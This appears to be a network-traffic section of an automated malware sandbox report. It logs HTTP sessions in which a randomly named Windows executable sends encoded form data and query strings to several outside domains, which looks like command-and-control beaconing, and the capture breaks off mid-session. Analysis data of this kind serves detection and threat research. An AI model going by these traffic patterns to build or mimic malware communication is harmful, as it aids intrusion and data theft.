                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.10 | 49736 | 91.195.240.19 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:04:58.560761929 CEST | 467 | OUT | GET /zwgt/?bFGXGTdX=dCUrqoNNqYa01jj8ucmLyHx7kNIUn0PrfHpa8tjXz+CKp9k6oQP/Fdto1b0bQ/emz29BsG965J3wVz+jeRQuKqDu3O+8XeswSZaKGjOqnVkBxijyaA==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.bitmapsportsbook.com
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:04:59.223208904 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.10 | 49737 | 198.12.241.35 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:05:04.720838070 CEST | 731 | OUT | POST /9og3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.aceautocorp.com
                                                          Origin: http://www.aceautocorp.com
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.aceautocorp.com/9og3/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:05:05.473997116 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:05:05 GMT
                                                          Server: Apache
                                                          X-Powered-By: PHP/8.1.29
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br
                                                          Content-Length: 10066
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          30 | 192.168.2.10 | 49738 | 198.12.241.35 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:05:07.264355898 CEST | 755 | OUT | POST /9og3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.aceautocorp.com
                                                          Origin: http://www.aceautocorp.com
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.aceautocorp.com/9og3/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:05:08.548958063 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:05:07 GMT
                                                          Server: Apache
                                                          X-Powered-By: PHP/8.1.29
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br
                                                          Content-Length: 10066
                                                          Content-Type: text/html; charset=UTF-8
                                                          Sep 11, 2024 22:05:08.549160004 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:05:07 GMT
                                                          Server: Apache
                                                          X-Powered-By: PHP/8.1.29
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br
                                                          Content-Length: 10066
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          31 | 192.168.2.10 | 49739 | 198.12.241.35 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:05:10.073736906 CEST | 1768 | OUT | POST /9og3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.aceautocorp.com
                                                          Origin: http://www.aceautocorp.com
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.aceautocorp.com/9og3/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:05:10.877616882 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:05:10 GMT
                                                          Server: Apache
                                                          X-Powered-By: PHP/8.1.29
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br
                                                          Content-Length: 10066
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          32 | 192.168.2.10 | 49740 | 198.12.241.35 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:05:12.608148098 CEST | 462 | OUT | GET /9og3/?bFGXGTdX=ZBkskPBELyIjvtDi08MWm9rbu3iLorcPFzn2FRxS1jOC36b61Sx96mOK+r72OxgWH8wd7wLlO4AB5vUmoL6nk1FBVggKsZuxPhO/hPMpvJNZBalqpQ==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.aceautocorp.com
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:05:13.260107994 CEST | 539 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Wed, 11 Sep 2024 20:05:13 GMT
                                                          Server: Apache
                                                          X-Powered-By: PHP/8.1.29
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          X-Redirect-By: WordPress
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Location: http://aceautocorp.com/9og3/?bFGXGTdX=ZBkskPBELyIjvtDi08MWm9rbu3iLorcPFzn2FRxS1jOC36b61Sx96mOK+r72OxgWH8wd7wLlO4AB5vUmoL6nk1FBVggKsZuxPhO/hPMpvJNZBalqpQ==&M87d=RDddFbF8
                                                          Vary: Accept-Encoding
                                                          Content-Length: 0
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          33 | 192.168.2.10 | 49741 | 91.195.240.19 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:05:18.328668118 CEST | 746 | OUT | POST /rlev/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.purpleheartlacey.com
                                                          Origin: http://www.purpleheartlacey.com
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.purpleheartlacey.com/rlev/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=bqdx0HHuHERDpfO67M5DAftSBl0b3VAwIjxzGa2xOpGg15MX5KDr7mNIsTGV8FcBTGDe1Z8ft7h8g9FeSer+weYIMfHgfZXnslRywQ2ivCpNYOYmhMlocEjcJ14zFV//aqxf1FXmaNjLFOa8royL09zOBxEEDbFCtZAm5xmCPxWYjUDwTEb57AWVIYJo
                                                          Sep 11, 2024 22:05:18.997102976 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          34 | 192.168.2.10 | 49742 | 91.195.240.19 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:05:20.858273983 CEST | 770 | OUT | POST /rlev/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.purpleheartlacey.com
                                                          Origin: http://www.purpleheartlacey.com
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.purpleheartlacey.com/rlev/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=bqdx0HHuHERDr+e64vRDJftVNF0bslBYIj9zGbihPbSg1cwX4LDr4mNIkzGMh1ceTGOp1d8ft7F8g81eSJ39xOYKA/HiR5XnslRywQSYvCxNf+Imgo5rCUjbO14zO1/7aqwI1BWDaInLFKS8r9eIttzAPRFTKOZGtbkFwRO/WDOetVi3CV6uo3KbGe8CswAbU4CkvZlhVVumBDy6TQ==
                                                          Sep 11, 2024 22:05:21.677721024 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          35 | 192.168.2.10 | 49743 | 91.195.240.19 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:05:23.389415026 CEST | 1783 | OUT | POST /rlev/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.purpleheartlacey.com
                                                          Origin: http://www.purpleheartlacey.com
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.purpleheartlacey.com/rlev/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:05:24.030232906 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          36 | 192.168.2.10 | 49744 | 91.195.240.19 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:05:25.921297073 CEST | 467 | OUT | GET /rlev/?bFGXGTdX=Wo1R3wm8Ej8entDC+cV4KaEDP0IDvxtNKgFdfJiYIIGalaQSkKKZ1Xkt0Su2x108KR/fnP4QiNVkos1WTd/84fgdAaOORrOEsxtw8yTuzQl5BJwg/A==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.purpleheartlacey.com
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:05:26.772846937 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          37 | 192.168.2.10 | 49745 | 31.186.11.254 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:05:40.290369987 CEST | 728 | OUT | POST /pt32/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.grafiktema.xyz
                                                          Origin: http://www.grafiktema.xyz
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.grafiktema.xyz/pt32/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=/1OST6SMAO0P7V54gpudQBmA/Um0Xj44m7oLcyMIE0IuNafJMQKOIoYWJsOtuHWMdNMe5CFcotIh9U2I5OpkU/1jeLO4v28/1PqseRbyKlqjVjsRHMuEdrLICOUL0v05l1Iu01YKG3tqzyJChoEYiE2KMSJSjIfzwRmScOkWi3X3/ciNdg80PTR7Pn6L


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          38 | 192.168.2.10 | 49746 | 31.186.11.254 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:05:43.470554113 CEST | 752 | OUT | POST /pt32/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.grafiktema.xyz
                                                          Origin: http://www.grafiktema.xyz
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.grafiktema.xyz/pt32/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=/1OST6SMAO0P90J4jOSdYBmH8Um0Az48m7kLc20YRW8uO7vJNSiOFIYWRcOsgnWHdNAW5CJcopYh9QyI5/pjGf1hLbO+wG8/1PqseQrIKlijVScREtuLVLLLUeUL+/09l1JB00VfGxhqzy5Ch5Eb703BRiIllqKe2kCPc9sN4GrWxdDKMxdjckN1BhPhtyMn++BEkPYFBmFgXyZIEw==


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          39 | 192.168.2.10 | 49747 | 31.186.11.254 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:05:45.997519970 CEST | 1765 | OUT | POST /pt32/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.grafiktema.xyz
                                                          Origin: http://www.grafiktema.xyz
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.grafiktema.xyz/pt32/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          40 | 192.168.2.10 | 49748 | 31.186.11.254 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:05:48.539350033 CEST | 461 | OUT | GET /pt32/?bFGXGTdX=y3myQPKMG7UG4U86kYjDSgzezXSmAkUzi6cKVm8KTXszLa2xdxq+NpYfRMeTkluAfKxM8yJJ9pAbryr3svtYXqMrD5rBnUtNlc/QUHCATHSaLBoyFg==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.grafiktema.xyz
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          41 | 192.168.2.10 | 49749 | 192.250.231.28 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:06:15.009797096 CEST | 716 | OUT | POST /o1v8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.cr-pos.com
                                                          Origin: http://www.cr-pos.com
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.cr-pos.com/o1v8/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=4gSSAGm8sqza4Tw4xEgewjtRKEK1ny0+XCrz686uH8gN6hlyoIj5HdX6OpY5BxiE1potXWcNWkiEGRFeIKYM8qZFA/UL8SdBEszsHurGTvkI/Dzo2Um5iS2xuiJa0Jz37qDWcdIDJWpXe74ic+w93zQmkWqLIKzdepHv8TeCb54jgGSyIKqle1rYsJvi
                                                          Sep 11, 2024 22:06:15.495182037 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Server: Microsoft-IIS/10.0
                                                          X-Powered-By: ASP.NET
                                                          X-Powered-By-Plesk: PleskWin
                                                          Date: Wed, 11 Sep 2024 20:06:15 GMT
                                                          Connection: close
                                                          Content-Length: 1245
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                          Sep 11, 2024 22:06:15.495198965 CEST | 219 | IN |
                                                          Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          42 | 192.168.2.10 | 49750 | 192.250.231.28 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:06:18.137933016 CEST | 740 | OUT | POST /o1v8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.cr-pos.com
                                                          Origin: http://www.cr-pos.com
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.cr-pos.com/o1v8/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=4gSSAGm8sqza5zA40lgenztSFkK1sS06XCnz6/2+EPEN6D9ypJj5ONX6GJYgFxiP1pVQXT0NWgyEGUpeI9sP/aZHYPUFkydBEszsHu/oTvcI/zjo3wy65y225SJa+pzz7qDwcf8lJTtXe/0icsI+8zQk5GrTZru4W7nLlwPIG4kBqHz1ZbLyNC3WiPaIW/nxLWzdkJTAcwYq45QBEg==
                                                          Sep 11, 2024 22:06:18.792932034 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Server: Microsoft-IIS/10.0
                                                          X-Powered-By: ASP.NET
                                                          X-Powered-By-Plesk: PleskWin
                                                          Date: Wed, 11 Sep 2024 20:06:18 GMT
                                                          Connection: close
                                                          Content-Length: 1245
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                          Sep 11, 2024 22:06:18.792953014 CEST | 219 | IN |
                                                          Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          43 | 192.168.2.10 | 49751 | 192.250.231.28 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:06:20.669379950 CEST | 1753 | OUT | POST /o1v8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.cr-pos.com
                                                          Origin: http://www.cr-pos.com
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.cr-pos.com/o1v8/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:06:21.178412914 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Server: Microsoft-IIS/10.0
                                                          X-Powered-By: ASP.NET
                                                          X-Powered-By-Plesk: PleskWin
                                                          Date: Wed, 11 Sep 2024 20:06:20 GMT
                                                          Connection: close
                                                          Content-Length: 1245
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                          Sep 11, 2024 22:06:21.178430080 CEST | 219 | IN |
                                                          Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          44 | 192.168.2.10 | 49752 | 192.250.231.28 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
